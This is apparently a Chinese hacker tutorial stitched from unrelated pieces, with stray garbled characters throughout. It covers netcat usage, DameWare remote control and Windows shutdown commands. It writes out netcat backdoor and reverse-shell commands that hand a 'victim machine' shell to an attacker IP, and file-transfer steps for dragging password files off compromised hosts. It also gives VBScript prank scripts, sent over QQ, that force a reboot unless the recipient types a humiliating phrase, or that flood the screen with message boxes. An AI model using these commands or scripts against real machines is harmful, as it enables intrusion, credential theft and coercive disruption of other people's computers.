NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大.
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1 NC.EXE是一个非标准的telnet客户端程序锋闭消,
1.2 还有一个putty.exe客户端程序,提供四种连接模式
-raw -telnet -rlogin -ssh.
虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。银知
######################################################################
2. Netcat 1.10 for NT 帮助信息
######################################################################
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后台模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本帮助信息)
-i secs delay interval for lines sent, ports scanned (延迟时间)
-l listen mode, for inbound connects (监听模式,等待连接)
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
-n numeric-only IP addresses, no DNS (ip数字模态岩式,非dns解析)
-o file hex dump of traffic (十六进制模式输出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (随机本地远程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (扫描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive] 3. Netcat 1.10 常用的命令格式
######################################################################
3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
3.2.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3. 后门
victim machine: //受害者的机器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器.
nc ip -p port //连接victim_IP,然后得到一个shell。
3.4.反向连接
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker_ip port1 cmd.exe nc attacker_ip port2
nc attacker_ip port1 /bin/sh nc attacker_ip port2
139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。 3.5.传送文件:
3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来.
nc -d -l -p port <path\filedest /*attacker machine*/ 可以shell执行
nc -vv attacker_ip port >path\file.txt /*victim machine*/ 需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
3.5.2 attacker machine -->victim machine //上传命令文件到肉鸡
nc -vv -l -p port >path\file.txt /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port <path\filedest /*attacker machine*/ 可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论: 可以传输ascii,bin文件.可以传输程序文件.
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .
或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?
3.6 端口数据抓包.
nc -vv -w 2 -o test.txt www.hackervip.com 80 21-15
<00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
<00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
<00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
<00000084 83 00 00 01 8f # .....
3.7 telnet,自动批处理。
nc victim_ip port <path\file.cmd /*victim machine*/ 显示执行过程.
nc -vv victim_ip port <path\file.cmd /*victim machine*/ 显示执行过程.
nc -d victim_ip port <path\file.cmd 安静模式.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
2 )DameWare Mini Remote Control 是一款功能强大的windows远程控制软件。只要拥有远程主机的一个有权限的帐号,就可以控制远程主机。这个软件在中安网培有最新的汉化版(www.hackervip.com/soft)
配置方法:
配置这个很简单,我们来看一下。点击“查看”菜单中的“属性”打开“default host 属性”窗口,选择“安装选项”,点击“编辑”来配置其属性。
在“DameWare米你远程控制属性”窗口的“常规”页中,提供了三种远程登陆验证类型,对于windows98/me只能使用“proprietary challenge/response”验证机制,需要你设置好用户id和密码。至于“windows nt challenge/response”和“加密的(128-bit)windows logon”要求控制者拥有对方主机的帐户和密码。在此可以设置端口和连接超时。
方法如下:在开始内点击运行输入at xx:xx shutdown -s,xx:xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消,就输入shutdown -a就可以取消了.我听一个朋友说,有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。
脚本,例如下面的东西。就可以实现。 1。
首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看 把隐藏已知文件类型的扩展名前面的勾去掉.
然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,你试试···"" ",0 ,true dim a
do while(a <>"我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵,猪" dim WSHshell
set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打
开了就在60秒内要关闭计算机,
结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任
意想说的话,要是对付你喜欢的人,
就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打
开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢? 第2招编写VBS脚本 首先好纤你可以看下面的
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName) WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我") WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。") WScript.Echo("小强很生气,后果很严重哦。") WScript.Echo("嘿嘿!你也会很惨滴哦") WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴") WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点友如仿,小笨蛋!") WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。") WScript.Echo("还剩45下,记得要快哦!") WScript.Echo("还剩43下") WScript.Echo("还剩42下") WScript.Echo("还剩41下") WScript.Echo("还剩40下") WScript.Echo("还剩39下") WScript.Echo("还剩38下") WScript.Echo("还剩37下") WScript.Echo("还剩36下") WScript.Echo("还剩35下"橡凯) WScript.Echo("还剩34下") WScript.Echo("还剩33下") WScript.Echo("还剩32下") WScript.Echo("还剩30下") WScript.Echo("还剩29
下")
WScript.Echo("还剩28下") WScript.Echo("还剩27下") WScript.Echo("还剩26下") WScript.Echo("还剩25下") WScript.Echo("还剩24下") WScript.Echo("还剩23下") WScript.Echo("还剩22下") WScript.Echo("还剩21下") WScript.Echo("还剩20下") WScript.Echo("还剩19下") WScript.Echo("还剩18下") WScript.Echo("还剩17下") WScript.Echo("还剩16下") WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说") WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555") WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?") WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家") WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!") WScript.Echo("还剩5
下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!") WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") WScript.Echo("想结素我么?那你就再多点一次") 把这个复制在记事本,把后缀修改成.vbs
在打开呢就会先说第一句的 嘿,谢谢你打开我哦,我等你很久拉! 他无论是点关闭或者是点确定都会再说第2句 再点就说地3句 会按顺序说完
你们注意哦,最后10句话,只是10句,你要是把这个复制再粘贴N次,那他还有个打完呢?
这样才做到整人了,要是给喜欢的人发去啊,那就写你要说的话吧,双引号里面的可以随便更改
这个最简单的就是结素任务来结束它 2。
把以下代码复制到记事本中 然后重命名为后缀名为VBS的文件~ do
msgbox"爽死你~" loop
Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中。如
果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。
比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”, 这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工 作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60 分钟后自动关机,“3600”代表60分钟。
设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入 “shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。
Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如 “-s”就表示关闭本地计算机,“-a”表示取消关机 *** 作,下面列出了更多参数,大家 可以在Shutdown.exe中按需使用。
-f:强行关闭应用程序
-m \\计算机名:控制远程计算机
-i:显示图形用户界面,但必须是Shutdown的第一个选项
-l:注销当前用户
-r:关机并重启
-t 时间:设置关机倒计时
-c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
有时候,我们需要定时关闭计算机,下面介绍一个在Windows XP下实现定时关机的简单方 法。
指定系统在22分钟后自动关闭:点击“开始→运行”,在“打开”中输入命令“Shutdown -s -t 1320”(注意:引号不输入,参数之间有空格,1320的单位是秒),单击“确定” 按钮即可。
指定系统在某个时间(比如12:00)自动关闭:在“打开”中输入命令 “at 12:00 Shutdown -s”即可。
取消定时关机:在“打开”中输入命令“Shutdown -a”即可。
能的实现都是使用“Shutdown”命令实现的,shutdown的参数是在命令行窗口中输入 “shutdown”。笔者认为最有用的是“-i”参数,可以调出“远程关机对话框”, 能方便地实现局域网内计算机的远程关机,有兴趣的朋友可以试一试。
开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览
-c:\windows\system32\shadow.exe-下一步-选好要关机的时间,
下一步-输入用户名和密码,只要是系统里有的用户就行,但一定要有密码, 没有也要设一个,下一步,选上“在完成时打开此任务的高级属性”, 在运行栏后面加上“ -S”引号不要哦。
比方说,要强行杀死“conime.exe”病毒进程,只要在命令提示符下执行“taskkill /im conime.exe”命令
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)